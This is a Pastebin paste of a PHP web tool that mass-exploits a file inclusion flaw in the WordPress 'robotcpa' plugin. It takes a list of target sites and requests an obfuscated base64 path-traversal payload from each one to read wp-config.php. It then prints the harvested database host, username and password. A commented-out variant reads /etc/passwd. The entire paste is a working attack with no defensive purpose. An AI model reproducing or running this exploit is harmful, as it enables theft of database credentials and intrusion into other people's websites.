daily pastebin goal
45%
SHARE
TWEET

Untitled

a guest Sep 22nd, 2016 76 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <form method="post" action="" >
  2. Targets :
  3. <br />
  4. <textarea style="width: 300px; height: 300px;" name="targets"></textarea>
  5. <br />
  6. <!--
  7. <select name="methods">
  8. <option value="Config">Config</option>
  9. <option value="etcpasswd">/etc/passwd</option>
  10. <!--<option value="Cpanel">Cpanel Login</option>
  11. </select>
  12.  !-->
  13. <input type="submit" name="sub" value="go" />
  14. </form>
  15. <?php
  16. error_reporting(0);
  17. function fetch_value($str, $find_start, $find_end)
  18. {
  19.     $start = strpos($str, $find_start);
  20.     if ($start === false) {
  21.         return "";
  22.     }
  23.     $length = strlen($find_start);
  24.     $end    = strpos(substr($str, $start + $length), $find_end);
  25.     return trim(substr($str, $start + $length, $end));
  26. }
  27. /////////////////////
  28. if(isset($_POST['sub']))
  29. {
  30. $targets = $_POST['targets'];
  31. $explode = explode("\r\n",$targets);
  32. /*
  33. switch($_POST['methods'])
  34. {
  35.     case 'Config' :
  36.     $host      = strip_tags(fetch_value($contents, "define('DB_HOST', '", "');"));
  37.     $user      = strip_tags(fetch_value($contents, "define('DB_USER', '", "');"));
  38.     $pass      = strip_tags(fetch_value($contents, "define('DB_PASSWORD', '", "');"));
  39.     $echo = "
  40.     <p>Site     : <font color='blue'> $crleet  </font><p>
  41.     <br>
  42.     <p>Host     : <font color='blue'> $host  </font><p>
  43.     <br>
  44.     <p>Username : <font color='blue'> $user  </font><p>
  45.     <br>
  46.     <p>Password : <font color='blue'> $pass  </font><p>
  47.     <br>
  48.     ";
  49.         $exploit = "/wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==";
  50.         break;
  51.     case 'etcpasswd' :
  52.         $echo = "
  53.         <p>Site     : <font color='blue'> $crleet  </font><p>
  54.         <p>etc/pass : <font color='blue'> $contents </font><p>
  55.         ";
  56.         $exploit = "/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk";
  57.         break;
  58. /*    case 'Cpanel' :
  59.         $echo "<p>Site     : <font color='blue'> $crleet  </font><p>
  60.                <p>User     : <font color='blue'> $crleet  </font><p>
  61.                <p>User     : <font color='blue'> $crleet  </font><p>
  62.          ";
  63.         $exploit = "/wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==";
  64.         break;  ////////////////////////
  65.         default:
  66.         echo "select your method";
  67. } */
  68.  
  69.  
  70. foreach( $explode as $crleet)
  71.  {
  72. $exploit = "/wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==";
  73. $larmy     = ($crleet).($exploit);
  74. $contents  = file_get_contents($larmy);
  75. $host      = strip_tags(fetch_value($contents, "define('DB_HOST', '", "');"));
  76. $user      = strip_tags(fetch_value($contents, "define('DB_USER', '", "');"));
  77. $pass      = strip_tags(fetch_value($contents, "define('DB_PASSWORD', '", "');"));
  78.  if(ereg("DB_HOST",$contents))
  79.    {
  80. echo "<hr>
  81.     <p>Site     : <font color='blue'> $crleet  </font><p>
  82.     <br>
  83.     <p>Host     : <font color='blue'> $host  </font><p>
  84.     <br>
  85.     <p>Username : <font color='blue'> $user  </font><p>
  86.     <br>
  87.     <p>Password : <font color='blue'> $pass  </font><p>
  88.     <br><hr>";
  89.  
  90.     } else {
  91.         echo
  92.      "
  93.     <hr>
  94.     <p>Site     : <font color='blue'> $crleet  </font><p>
  95.     <br>
  96.     <p>Host     : <font color='blue'> Not Infected </font><p>
  97.     <br>
  98.     <p><a href='$larmy' >manual exploitation </a><p>
  99.     <hr>
  100.     ";
  101.            }
  102.  }
  103.  
  104. }
  105. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top